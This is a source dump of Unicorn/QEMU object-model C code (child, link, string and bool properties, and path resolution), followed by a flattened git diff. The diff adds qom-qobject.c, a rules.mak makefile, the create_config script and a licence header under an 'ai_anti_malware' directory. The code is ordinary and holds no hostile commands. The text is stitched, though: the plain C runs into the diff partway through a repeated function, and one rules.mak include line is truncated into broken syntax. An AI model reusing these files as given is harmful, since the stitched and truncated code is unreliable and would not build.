    gchar *path;

    path = object_get_canonical_path(child);
    visit_type_str(v, &path, name, errp);
    g_free(path);
}

/* Resolver for child properties: the child is the opaque itself. */
static Object *object_resolve_child_property(struct uc_struct *uc, Object *parent, void *opaque, const gchar *part)
{
    return opaque;
}

/* Release hook for child properties: unparent and drop the reference. */
static void object_finalize_child_property(struct uc_struct *uc, Object *obj, const char *name,
                                           void *opaque)
{
    Object *child = opaque;

    if (child->class_->unparent) {
        (child->class_->unparent)(uc, child);
    }
    child->parent = NULL;
    object_unref(uc, child);
}

/*
 * Add @child to @obj under property @name.  Takes a reference on the
 * child and records @obj as its parent; fails if the child is already
 * parented elsewhere.
 */
void object_property_add_child(Object *obj, const char *name,
                               Object *child, Error **errp)
{
    Error *local_err = NULL;
    gchar *type;
    ObjectProperty *op;

    if (child->parent != NULL) {
        error_setg(errp, "child object is already parented");
        return;
    }

    type = g_strdup_printf("child<%s>", object_get_typename(OBJECT(child)));

    op = object_property_add(obj, name, type, object_get_child_property, NULL,
                             object_finalize_child_property, child, &local_err);
    if (local_err) {
        error_propagate(errp, local_err);
        goto out;
    }

    op->resolve = object_resolve_child_property;
    object_ref(child);
    child->parent = obj;

out:
    g_free(type);
}
/* check() callback that accepts any target. */
void object_property_allow_set_link(Object *obj, const char *name,
                                    Object *val, Error **errp)
{
    /* Allow the link to be set, always */
}

/* Per-link-property state stored in the property's opaque pointer. */
typedef struct {
    Object **child;                                      /* where the target is stored */
    void (*check)(Object *, const char *, Object *, Error **); /* validation hook */
    ObjectPropertyLinkFlags flags;
} LinkProperty;

/* Getter for link properties: emits the target's canonical path or "". */
static void object_get_link_property(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque,
                                     const char *name, Error **errp)
{
    LinkProperty *lprop = opaque;
    Object **child = lprop->child;
    gchar *path;

    if (*child) {
        path = object_get_canonical_path(*child);
        visit_type_str(v, &path, name, errp);
        g_free(path);
    } else {
        path = (gchar *)"";
        visit_type_str(v, &path, name, errp);
    }
}

/*
 * object_resolve_link:
 *
 * Lookup an object and ensure its type matches the link property type. This
 * is similar to object_resolve_path() except type verification against the
 * link property is performed.
 *
 * Returns: The matched object or NULL on path lookup failures.
 */
static Object *object_resolve_link(struct uc_struct *uc, Object *obj, const char *name,
                                   const char *path, Error **errp)
{
    const char *type;
    gchar *target_type;
    bool ambiguous = false;
    Object *target;

    /* Go from "link<FOO>" to "FOO": strip the 5-char prefix and the
     * closing '>'. */
    type = object_property_get_type(obj, name, NULL);
    target_type = g_strndup(&type[5], strlen(type) - 6);
    target = object_resolve_path_type(uc, path, target_type, &ambiguous);

    if (ambiguous) {
        error_set(errp, ERROR_CLASS_GENERIC_ERROR,
                  "Path '%s' does not uniquely identify an object", path);
    } else if (!target) {
        /* Distinguish "wrong type" from "no such object" for the error. */
        target = object_resolve_path(uc, path, &ambiguous);
        if (target || ambiguous) {
            error_set(errp, QERR_INVALID_PARAMETER_TYPE, name, target_type);
        } else {
            error_set(errp, QERR_DEVICE_NOT_FOUND, path);
        }
        target = NULL;
    }
    g_free(target_type);

    return target;
}

/*
 * Setter for link properties: resolve the visited path, run the check
 * hook, then swap the stored target (referencing the new, unreferencing
 * the old).  Returns 0 on success, -1 on error.
 */
static int object_set_link_property(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque,
                                    const char *name, Error **errp)
{
    Error *local_err = NULL;
    LinkProperty *prop = opaque;
    Object **child = prop->child;
    Object *old_target = *child;
    Object *new_target = NULL;
    char *path = NULL;

    visit_type_str(v, &path, name, &local_err);

    if (!local_err && strcmp(path, "") != 0) {
        new_target = object_resolve_link(uc, obj, name, path, &local_err);
    }

    g_free(path);
    if (local_err) {
        error_propagate(errp, local_err);
        return -1;
    }

    /* check is non-NULL here: the setter is only installed when a
     * check callback was supplied (see object_property_add_link). */
    prop->check(obj, name, new_target, &local_err);
    if (local_err) {
        error_propagate(errp, local_err);
        return -1;
    }

    object_ref(new_target);
    *child = new_target;
    object_unref(uc, old_target);

    return 0;
}

/* Resolver for link properties: the currently linked object. */
static Object *object_resolve_link_property(struct uc_struct *uc, Object *parent, void *opaque, const gchar *part)
{
    LinkProperty *lprop = opaque;

    return *lprop->child;
}

/* Release hook: optionally unref the target, then free the state. */
static void object_release_link_property(struct uc_struct *uc, Object *obj, const char *name,
                                         void *opaque)
{
    LinkProperty *prop = opaque;

    if ((prop->flags & OBJ_PROP_LINK_UNREF_ON_RELEASE) && *prop->child) {
        object_unref(uc, *prop->child);
    }
    g_free(prop);
}

/*
 * Add a "link<type>" property whose value lives in *@child.  @check
 * validates assignments (NULL makes the property read-only); @flags
 * controls whether the target is unreferenced on release.
 */
void object_property_add_link(Object *obj, const char *name,
                              const char *type, Object **child,
                              void (*check)(Object *, const char *,
                                            Object *, Error **),
                              ObjectPropertyLinkFlags flags,
                              Error **errp)
{
    Error *local_err = NULL;
    LinkProperty *prop = g_malloc(sizeof(*prop));
    gchar *full_type;
    ObjectProperty *op;

    prop->child = child;
    prop->check = check;
    prop->flags = flags;

    full_type = g_strdup_printf("link<%s>", type);

    op = object_property_add(obj, name, full_type,
                             object_get_link_property,
                             check ? object_set_link_property : NULL,
                             object_release_link_property,
                             prop,
                             &local_err);
    if (local_err) {
        error_propagate(errp, local_err);
        g_free(prop);
        goto out;
    }

    op->resolve = object_resolve_link_property;

out:
    g_free(full_type);
}
/*
 * Name of the child property under which @obj hangs off its parent.
 * The object must be parented; aborts otherwise.
 */
gchar *object_get_canonical_path_component(Object *obj)
{
    ObjectProperty *prop = NULL;

    g_assert(obj);
    g_assert(obj->parent != NULL);

    QTAILQ_FOREACH(prop, &obj->parent->properties, node) {
        if (!object_property_is_child(prop)) {
            continue;
        }

        if (prop->opaque == obj) {
            return g_strdup(prop->name);
        }
    }

    /* obj had a parent but was not a child, should never happen */
    g_assert_not_reached();
    return NULL;
}

/*
 * Absolute "/a/b/c" path of @obj from the composition root.  Caller
 * frees the result.  NOTE(review): object_get_root(NULL) relies on the
 * root having been created already for some uc — confirm against callers.
 */
gchar *object_get_canonical_path(Object *obj)
{
    Object *root = object_get_root(NULL);
    char *newpath, *path = NULL;

    while (obj != root) {
        char *component = object_get_canonical_path_component(obj);

        if (path) {
            newpath = g_strdup_printf("%s/%s", component, path);
            g_free(component);
            g_free(path);
            path = newpath;
        } else {
            path = component;
        }

        obj = obj->parent;
    }

    newpath = g_strdup_printf("/%s", path ? path : "");
    g_free(path);

    return newpath;
}

/* Resolve one path component under @parent via the property's resolver. */
Object *object_resolve_path_component(struct uc_struct *uc, Object *parent, const gchar *part)
{
    ObjectProperty *prop = object_property_find(parent, part, NULL);
    if (prop == NULL) {
        return NULL;
    }

    if (prop->resolve) {
        return prop->resolve(uc, parent, prop->opaque, part);
    } else {
        return NULL;
    }
}

/*
 * Walk @parts from @index down the tree; at the end of the path the
 * result is type-checked (cast to @typename).  Empty components are
 * skipped, so "//" and a leading "/" are harmless.
 */
static Object *object_resolve_abs_path(struct uc_struct *uc, Object *parent,
                                       gchar **parts,
                                       const char *typename,
                                       int index)
{
    Object *child;

    if (parts[index] == NULL) {
        return object_dynamic_cast(uc, parent, typename);
    }

    if (strcmp(parts[index], "") == 0) {
        return object_resolve_abs_path(uc, parent, parts, typename, index + 1);
    }

    child = object_resolve_path_component(uc, parent, parts[index]);
    if (!child) {
        return NULL;
    }

    return object_resolve_abs_path(uc, child, parts, typename, index + 1);
}

/*
 * Try @parts as a suffix anywhere below @parent.  Returns the unique
 * match, or NULL (setting *@ambiguous when more than one subtree
 * matched).
 */
static Object *object_resolve_partial_path(struct uc_struct *uc, Object *parent,
                                           gchar **parts,
                                           const char *typename,
                                           bool *ambiguous)
{
    Object *obj;
    ObjectProperty *prop;

    obj = object_resolve_abs_path(uc, parent, parts, typename, 0);

    QTAILQ_FOREACH(prop, &parent->properties, node) {
        Object *found;

        if (!object_property_is_child(prop)) {
            continue;
        }

        found = object_resolve_partial_path(uc, prop->opaque, parts,
                                            typename, ambiguous);
        if (found) {
            if (obj) {
                /* second match — the path is ambiguous */
                if (ambiguous) {
                    *ambiguous = true;
                }
                return NULL;
            }
            obj = found;
        }

        if (ambiguous && *ambiguous) {
            return NULL;
        }
    }

    return obj;
}

/*
 * Resolve @path to an object of type @typename.  A path starting with
 * '/' is absolute; anything else is matched as a partial (suffix) path
 * anywhere in the tree, with ambiguity reported via *@ambiguous.
 */
Object *object_resolve_path_type(struct uc_struct *uc, const char *path, const char *typename,
                                 bool *ambiguous)
{
    Object *obj;
    gchar **parts;

    parts = g_strsplit(path, "/", 0);
    assert(parts);

    if (parts[0] == NULL || strcmp(parts[0], "") != 0) {
        if (ambiguous) {
            *ambiguous = false;
        }
        obj = object_resolve_partial_path(uc, object_get_root(NULL), parts,
                                          typename, ambiguous);
    } else {
        obj = object_resolve_abs_path(uc, object_get_root(NULL), parts, typename, 1);
    }

    g_strfreev(parts);

    return obj;
}
object_resolve_abs_path(uc, object_get_root(NULL), parts, typename, 1); + } + + g_strfreev(parts); + + return obj; +} + +Object *object_resolve_path(struct uc_struct *uc, const char *path, bool *ambiguous) +{ + return object_resolve_path_type(uc, path, TYPE_OBJECT, ambiguous); +} + +typedef struct StringProperty +{ + char *(*get)(struct uc_struct *uc, Object *, Error **); + int (*set)(struct uc_struct *uc, Object *, const char *, Error **); +} StringProperty; + +static void property_get_str(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + StringProperty *prop = opaque; + char *value; + + value = prop->get(uc, obj, errp); + if (value) { + visit_type_str(v, &value, name, errp); + g_free(value); + } +} + +static int property_set_str(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + StringProperty *prop = opaque; + char *value; + Error *local_err = NULL; + + visit_type_str(v, &value, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + + prop->set(uc, obj, value, errp); + g_free(value); + + return 0; +} + +static void property_release_str(struct uc_struct *uc, Object *obj, const char *name, + void *opaque) +{ + StringProperty *prop = opaque; + g_free(prop); +} + +void object_property_add_str(Object *obj, const char *name, + char *(*get)(struct uc_struct *uc, Object *, Error **), + int (*set)(struct uc_struct *uc, Object *, const char *, Error **), + Error **errp) +{ + Error *local_err = NULL; + StringProperty *prop = g_malloc0(sizeof(*prop)); + + prop->get = get; + prop->set = set; + + object_property_add(obj, name, "string", + get ? property_get_str : NULL, + set ? 
property_set_str : NULL, + property_release_str, + prop, &local_err); + if (local_err) { + error_propagate(errp, local_err); + g_free(prop); + } +} + +typedef struct BoolProperty +{ + bool (*get)(struct uc_struct *uc, Object *, Error **); + int (*set)(struct uc_struct *uc, Object *, bool, Error **); +} BoolProperty; + +static void property_get_bool(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + BoolProperty *prop = opaque; + bool value; + + value = prop->get(uc, obj, errp); + visit_type_bool(v, &value, name, errp); +} + +static int property_set_bool(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + BoolProperty *prop = opaque; + bool value; + Error *local_err = NULL; + + visit_type_bool(v, &value, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + + return prop->set(uc, obj, value, errp); +} + +static void property_release_bool(struct uc_struct *uc, Object *obj, const char *name, + void *opaque) +{ + BoolProperty *prop = opaque; + g_free(prop); +} + +void object_property_add_bool(struct uc_struct *uc, Object *obj, const char *name, + bool (*get)(struct uc_struct *uc, Object *, Error **), + int (*set)(struct uc_struct *uc, Object *, bool, Error **), + Error **errp) +{ + Error *local_err = NULL; + BoolProperty *prop = g_malloc0(sizeof(*prop)); + + prop->get = get; + prop->set = set; + + object_property_add(obj, name, "bool", + get ? property_get_bool : NULL, + set ? 
property_set_bool : NULL, + property_release_bool, + prop, &local_err); + if (local_err) { + error_propagate(errp, local_err); + g_free(prop); + } +} + +static char *qdev_get_type(struct uc_struct *uc, Object *obj, Error **errp) +{ + return g_strdup(object_get_typename(obj)); +} + +static void property_get_uint8_ptr(struct uc_struct *uc, Object *obj, Visitor *v, + void *opaque, const char *name, + Error **errp) +{ + uint8_t value = *(uint8_t *)opaque; + visit_type_uint8(v, &value, name, errp); +} + +static void property_get_uint16_ptr(struct uc_struct *uc, Object *obj, Visitor *v, + void *opaque, const char *name, + Error **errp) +{ + uint16_t value = *(uint16_t *)opaque; + visit_type_uint16(v, &value, name, errp); +} + +static void property_get_uint32_ptr(struct uc_struct *uc, Object *obj, Visitor *v, + void *opaque, const char *name, + Error **errp) +{ + uint32_t value = *(uint32_t *)opaque; + visit_type_uint32(v, &value, name, errp); +} + +static void property_get_uint64_ptr(struct uc_struct *uc, Object *obj, Visitor *v, + void *opaque, const char *name, + Error **errp) +{ + uint64_t value = *(uint64_t *)opaque; + visit_type_uint64(v, &value, name, errp); +} + +void object_property_add_uint8_ptr(Object *obj, const char *name, + const uint8_t *v, Error **errp) +{ + object_property_add(obj, name, "uint8", property_get_uint8_ptr, + NULL, NULL, (void *)v, errp); +} + +void object_property_add_uint16_ptr(Object *obj, const char *name, + const uint16_t *v, Error **errp) +{ + object_property_add(obj, name, "uint16", property_get_uint16_ptr, + NULL, NULL, (void *)v, errp); +} + +void object_property_add_uint32_ptr(Object *obj, const char *name, + const uint32_t *v, Error **errp) +{ + object_property_add(obj, name, "uint32", property_get_uint32_ptr, + NULL, NULL, (void *)v, errp); +} + +void object_property_add_uint64_ptr(Object *obj, const char *name, + const uint64_t *v, Error **errp) +{ + object_property_add(obj, name, "uint64", property_get_uint64_ptr, + NULL, NULL, 
(void *)v, errp); +} + +typedef struct { + Object *target_obj; + const char *target_name; +} AliasProperty; + +static void property_get_alias(struct uc_struct *uc, Object *obj, struct Visitor *v, void *opaque, + const char *name, Error **errp) +{ + AliasProperty *prop = opaque; + + object_property_get(uc, prop->target_obj, v, prop->target_name, errp); +} + +static int property_set_alias(struct uc_struct *uc, Object *obj, struct Visitor *v, void *opaque, + const char *name, Error **errp) +{ + AliasProperty *prop = opaque; + + object_property_set(uc, prop->target_obj, v, prop->target_name, errp); + + return 0; +} + +static Object *property_resolve_alias(struct uc_struct *uc, Object *obj, void *opaque, + const gchar *part) +{ + AliasProperty *prop = opaque; + + return object_resolve_path_component(uc, prop->target_obj, prop->target_name); +} + +static void property_release_alias(struct uc_struct *uc, Object *obj, const char *name, void *opaque) +{ + AliasProperty *prop = opaque; + + g_free(prop); +} + +void object_property_add_alias(Object *obj, const char *name, + Object *target_obj, const char *target_name, + Error **errp) +{ + AliasProperty *prop; + ObjectProperty *op; + ObjectProperty *target_prop; + gchar *prop_type; + Error *local_err = NULL; + + target_prop = object_property_find(target_obj, target_name, errp); + if (!target_prop) { + return; + } + + if (object_property_is_child(target_prop)) { + prop_type = g_strdup_printf("link%s", + target_prop->type + strlen("child")); + } else { + prop_type = g_strdup(target_prop->type); + } + + prop = g_malloc(sizeof(*prop)); + prop->target_obj = target_obj; + prop->target_name = target_name; + + op = object_property_add(obj, name, prop_type, + property_get_alias, + property_set_alias, + property_release_alias, + prop, &local_err); + if (local_err) { + error_propagate(errp, local_err); + g_free(prop); + goto out; + } + op->resolve = property_resolve_alias; + + object_property_set_description(obj, name, + 
target_prop->description, + &error_abort); + +out: + g_free(prop_type); +} + +void object_property_set_description(Object *obj, const char *name, + const char *description, Error **errp) +{ + ObjectProperty *op; + + op = object_property_find(obj, name, errp); + if (!op) { + return; + } + + g_free(op->description); + op->description = g_strdup(description); +} + +static void object_instance_init(struct uc_struct *uc, Object *obj, void *opaque) +{ + object_property_add_str(obj, "type", qdev_get_type, NULL, NULL); +} + +void register_types_object(struct uc_struct *uc) +{ + static TypeInfo interface_info = { + TYPE_INTERFACE, // name + NULL, + + sizeof(InterfaceClass), // class_size + 0, + NULL, + + NULL, + NULL, + NULL, + + NULL, + + NULL, + NULL, + NULL, + + true, // abstract + }; + + static TypeInfo object_info = { + TYPE_OBJECT, + NULL, + + 0, + sizeof(Object), + NULL, + + object_instance_init, + NULL, + NULL, + + NULL, + + NULL, + NULL, + NULL, + + true, + }; + + uc->type_interface = type_register_internal(uc, &interface_info); + type_register_internal(uc, &object_info); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qom/qom-qobject.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/qom-qobject.c new file mode 100644 index 0000000..f1579ff --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/qom-qobject.c @@ -0,0 +1,44 @@ +/* + * QEMU Object Model - QObject wrappers + * + * Copyright (C) 2012 Red Hat, Inc. + * + * Author: Paolo Bonzini + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. 
+ */ + +#include "qemu-common.h" +#include "qom/object.h" +#include "qom/qom-qobject.h" +#include "qapi/visitor.h" +#include "qapi/qmp-input-visitor.h" +#include "qapi/qmp-output-visitor.h" + +void object_property_set_qobject(struct uc_struct *uc, Object *obj, QObject *value, + const char *name, Error **errp) +{ + QmpInputVisitor *mi; + mi = qmp_input_visitor_new(value); + object_property_set(uc, obj, qmp_input_get_visitor(mi), name, errp); // qq + + qmp_input_visitor_cleanup(mi); +} + +QObject *object_property_get_qobject(struct uc_struct *uc, Object *obj, const char *name, + Error **errp) +{ + QObject *ret = NULL; + Error *local_err = NULL; + QmpOutputVisitor *mo; + + mo = qmp_output_visitor_new(); + object_property_get(uc, obj, qmp_output_get_visitor(mo), name, &local_err); + if (!local_err) { + ret = qmp_output_get_qobject(mo); + } + error_propagate(errp, local_err); + qmp_output_visitor_cleanup(mo); + return ret; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/rules.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/rules.mak new file mode 100644 index 0000000..d4144b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/rules.mak @@ -0,0 +1,361 @@ + +# Don't use implicit rules or variables +# we have explicit rules for everything +MAKEFLAGS += -rR + +# Files with this suffixes are final, don't try to generate them +# using implicit rules +%.d: +%.h: +%.c: +%.cc: +%.cpp: +%.m: +%.mak: + +# Flags for dependency generation +QEMU_DGFLAGS += -MMD -MP -MT $@ -MF $(*D)/$(*F).d + +# Same as -I$(SRC_PATH) -I., but for the nested source/object directories +QEMU_INCLUDES += -I$(/dev/null 2>&1 && echo OK), $2, $3) + +VPATH_SUFFIXES = %.c %.h %.S %.cc %.cpp %.m %.mak %.texi %.sh %.rc +set-vpath = $(if $1,$(foreach PATTERN,$(VPATH_SUFFIXES),$(eval vpath $(PATTERN) $1))) + +# install-prog list, dir +define install-prog + $(INSTALL_DIR) "$2" + $(INSTALL_PROG) $1 "$2" + $(if $(STRIP),$(STRIP) $(foreach T,$1,"$2/$(notdir $T)"),) +endef + +# find-in-path 
+# Usage: $(call find-in-path, prog) +# Looks in the PATH if the argument contains no slash, else only considers one +# specific directory. Returns an # empty string if the program doesn't exist +# there. +find-in-path = $(if $(find-string /, $1), \ + $(wildcard $1), \ + $(wildcard $(patsubst %, %/$1, $(subst :, ,$(PATH))))) + +# Logical functions (for operating on y/n values like CONFIG_FOO vars) +# Inputs to these must be either "y" (true) or "n" or "" (both false) +# Output is always either "y" or "n". +# Usage: $(call land,$(CONFIG_FOO),$(CONFIG_BAR)) +# Logical NOT +lnot = $(if $(subst n,,$1),n,y) +# Logical AND +land = $(if $(findstring yy,$1$2),y,n) +# Logical OR +lor = $(if $(findstring y,$1$2),y,n) +# Logical XOR (note that this is the inverse of leqv) +lxor = $(if $(filter $(call lnot,$1),$(call lnot,$2)),n,y) +# Logical equivalence (note that leqv "","n" is true) +leqv = $(if $(filter $(call lnot,$1),$(call lnot,$2)),y,n) +# Logical if: like make's $(if) but with an leqv-like test +lif = $(if $(subst n,,$1),$2,$3) + +# String testing functions: inputs to these can be any string; +# the output is always either "y" or "n". Leading and trailing whitespace +# is ignored when comparing strings. 
+# String equality +eq = $(if $(subst $2,,$1)$(subst $1,,$2),n,y) +# String inequality +ne = $(if $(subst $2,,$1)$(subst $1,,$2),y,n) +# Emptiness/non-emptiness tests: +isempty = $(if $1,n,y) +notempty = $(if $1,y,n) + +# Generate files with tracetool +TRACETOOL=$(PYTHON) $(SRC_PATH)/scripts/tracetool.py + +# Generate timestamp files for .h include files + +config-%.h: config-%.h-timestamp + @cmp $< $@ >/dev/null 2>&1 || cp $< $@ + +config-%.h-timestamp: config-%.mak + $(call quiet-command, sh $(SRC_PATH)/scripts/create_config < $< > $@, " GEN $(TARGET_DIR)config-$*.h") + +.PHONY: clean-timestamp +clean-timestamp: + rm -f *.timestamp +clean: clean-timestamp + +# will delete the target of a rule if commands exit with a nonzero exit status +.DELETE_ON_ERROR: + +# save-vars +# Usage: $(call save-vars, vars) +# Save each variable $v in $vars as save-vars-$v, save their object's +# variables, then clear $v. +define save-vars + $(foreach v,$1, + $(eval save-vars-$v := $(value $v)) + $(foreach o,$($v), + $(foreach k,cflags libs objs, + $(if $($o-$k), + $(eval save-vars-$o-$k := $($o-$k)) + $(eval $o-$k := )))) + $(eval $v := )) +endef + +# load-vars +# Usage: $(call load-vars, vars, add_var) +# Load the saved value for each variable in @vars, and the per object +# variables. +# Append @add_var's current value to the loaded value. +define load-vars + $(eval $2-new-value := $(value $2)) + $(foreach v,$1, + $(eval $v := $(value save-vars-$v)) + $(foreach o,$($v), + $(foreach k,cflags libs objs, + $(if $(save-vars-$o-$k), + $(eval $o-$k := $(save-vars-$o-$k)) + $(eval save-vars-$o-$k := )))) + $(eval save-vars-$v := )) + $(eval $2 := $(value $2) $($2-new-value)) +endef + +# fix-paths +# Usage: $(call fix-paths, obj_path, src_path, vars) +# Add prefix @obj_path to all objects in @vars, and add prefix @src_path to all +# directories in @vars. 
+define fix-paths + $(foreach v,$3, + $(foreach o,$($v), + $(if $($o-libs), + $(eval $1$o-libs := $($o-libs))) + $(if $($o-cflags), + $(eval $1$o-cflags := $($o-cflags))) + $(if $($o-objs), + $(eval $1$o-objs := $(addprefix $1,$($o-objs))))) + $(eval $v := $(addprefix $1,$(filter-out %/,$($v))) \ + $(addprefix $2,$(filter %/,$($v))))) +endef + +# unnest-var-recursive +# Usage: $(call unnest-var-recursive, obj_prefix, vars, var) +# +# Unnest @var by including subdir Makefile.objs, while protect others in @vars +# unchanged. +# +# @obj_prefix is the starting point of object path prefix. +# +define unnest-var-recursive + $(eval dirs := $(sort $(filter %/,$($3)))) + $(eval $3 := $(filter-out %/,$($3))) + $(foreach d,$(dirs:%/=%), + $(call save-vars,$2) + $(eval obj := $(if $1,$1/)$d) + $(eval -include $(SRC_PATH)/$d/Makefile.objs) + $(call fix-paths,$(if $1,$1/)$d/,$d/,$2) + $(call load-vars,$2,$3) + $(call unnest-var-recursive,$1,$2,$3)) +endef + +# unnest-vars +# Usage: $(call unnest-vars, obj_prefix, vars) +# +# @obj_prefix: object path prefix, can be empty, or '..', etc. Don't include +# ending '/'. +# +# @vars: the list of variable names to unnest. +# +# This macro will scan subdirectories's Makefile.objs, include them, to build +# up each variable listed in @vars. +# +# Per object and per module cflags and libs are saved with relative path fixed +# as well, those variables include -libs, -cflags and -objs. Items in -objs are +# also fixed to relative path against SRC_PATH plus the prefix @obj_prefix. +# +# All nested variables postfixed by -m in names are treated as DSO variables, +# and will be built as modules, if enabled. +# +# A simple example of the unnest: +# +# obj_prefix = .. 
+# vars = hot cold +# hot = fire.o sun.o season/ +# cold = snow.o water/ season/ +# +# Unnest through a faked source directory structure: +# +# SRC_PATH +# ├── water +# │ └── Makefile.objs──────────────────┐ +# │ │ hot += steam.o │ +# │ │ cold += ice.mo │ +# │ │ ice.mo-libs := -licemaker │ +# │ │ ice.mo-objs := ice1.o ice2.o │ +# │ └──────────────────────────────┘ +# │ +# └── season +# └── Makefile.objs──────┐ +# │ hot += summer.o │ +# │ cold += winter.o │ +# └──────────────────┘ +# +# In the end, the result will be: +# +# hot = ../fire.o ../sun.o ../season/summer.o +# cold = ../snow.o ../water/ice.mo ../season/winter.o +# ../water/ice.mo-libs = -licemaker +# ../water/ice.mo-objs = ../water/ice1.o ../water/ice2.o +# +# Note that 'hot' didn't include 'season/' in the input, so 'summer.o' is not +# included. +# +define unnest-vars + # In the case of target build (i.e. $1 == ..), fix path for top level + # Makefile.objs objects + $(if $1,$(call fix-paths,$1/,,$2)) + + # Descend and include every subdir Makefile.objs + $(foreach v, $2, $(call unnest-var-recursive,$1,$2,$v)) + + $(foreach v,$(filter %-m,$2), + # All .o found in *-m variables are single object modules, create .mo + # for them + $(foreach o,$(filter %.o,$($v)), + $(eval $(o:%.o=%.mo)-objs := $o)) + # Now unify .o in -m variable to .mo + $(eval $v := $($v:%.o=%.mo)) + $(eval modules-m += $($v)) + + # For module build, build shared libraries during "make modules" + # For non-module build, add -m to -y + $(if $(CONFIG_MODULES), + $(foreach o,$($v), + $(eval $o: $($o-objs))) + $(eval $(patsubst %-m,%-y,$v) += $($v)) + $(eval modules: $($v:%.mo=%$(DSOSUF))), + $(eval $(patsubst %-m,%-y,$v) += $(call expand-objs, $($v))))) + + # Post-process all the unnested vars + $(foreach v,$2, + $(foreach o, $(filter %.mo,$($v)), + # Find all the .mo objects in variables and add dependency rules + # according to .mo-objs. 
Report error if not set + $(if $($o-objs), + $(eval $(o:%.mo=%$(DSOSUF)): module-common.o $($o-objs)), + $(error $o added in $v but $o-objs is not set)) + # Pass the .mo-cflags and .mo-libs along to member objects + $(foreach p,$($o-objs), + $(if $($o-cflags), $(eval $p-cflags += $($o-cflags))) + $(if $($o-libs), $(eval $p-libs += $($o-libs))))) + $(shell mkdir -p ./ $(sort $(dir $($v)))) + # Include all the .d files + $(eval -include $(addsuffix *.d, $(sort $(dir $($v))))) + $(eval $v := $(filter-out %/,$($v)))) + + # For all %.mo objects that are directly added into -y, expand them to %.mo-objs + $(foreach v,$2, + $(eval $v := $(foreach o,$($v),$(if $($o-objs),$($o-objs),$o)))) + +endef diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/create_config b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/create_config new file mode 100644 index 0000000..a286002 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/create_config @@ -0,0 +1,76 @@ +#!/bin/sh + +echo "/* Automatically generated by create_config - do not modify */" + +while read line; do + +case $line in + qemu_*dir=*) # qemu-specific directory configuration + name=${line%=*} + value=${line#*=} + define_name=`echo $name | LC_ALL=C tr '[a-z]' '[A-Z]'` + eval "define_value=\"$value\"" + echo "#define CONFIG_$define_name \"$define_value\"" + # save for the next definitions + eval "$name=\$define_value" + ;; + prefix=*) + # save for the next definitions + prefix=${line#*=} + ;; + CONFIG_*=y) # configuration + name=${line%=*} + echo "#define $name 1" + ;; + CONFIG_*=*) # configuration + name=${line%=*} + value=${line#*=} + echo "#define $name $value" + ;; + ARCH=*) # configuration + arch=${line#*=} + arch_name=`echo $arch | LC_ALL=C tr '[a-z]' '[A-Z]'` + echo "#define HOST_$arch_name 1" + ;; + HOST_CC=*) + # do nothing + ;; + HOST_*=y) # configuration + name=${line%=*} + echo "#define $name 1" + ;; + HOST_*=*) # configuration + name=${line%=*} + value=${line#*=} + echo 
"#define $name $value" + ;; + TARGET_BASE_ARCH=*) # configuration + target_base_arch=${line#*=} + base_arch_name=`echo $target_base_arch | LC_ALL=C tr '[a-z]' '[A-Z]'` + echo "#define TARGET_$base_arch_name 1" + ;; + TARGET_XML_FILES=*) + # do nothing + ;; + TARGET_ABI_DIR=*) + # do nothing + ;; + TARGET_NAME=*) + target_name=${line#*=} + echo "#define TARGET_NAME \"$target_name\"" + ;; + TARGET_DIRS=*) + # do nothing + ;; + TARGET_*=y) # configuration + name=${line%=*} + echo "#define $name 1" + ;; + TARGET_*=*) # configuration + name=${line%=*} + value=${line#*=} + echo "#define $name $value" + ;; +esac + +done # read diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/ordereddict.py b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/ordereddict.py new file mode 100644 index 0000000..f103954 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/ordereddict.py @@ -0,0 +1,132 @@ +# Copyright (c) 2009 Raymond Hettinger +# +# Permission is hereby granted, free of charge, to any person +# obtaining a copy of this software and associated documentation files +# (the "Software"), to deal in the Software without restriction, +# including without limitation the rights to use, copy, modify, merge, +# publish, distribute, sublicense, and/or sell copies of the Software, +# and to permit persons to whom the Software is furnished to do so, +# subject to the following conditions: +# +# The above copyright notice and this permission notice shall be +# included in all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES +# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND +# NONINFRINGEMENT. 
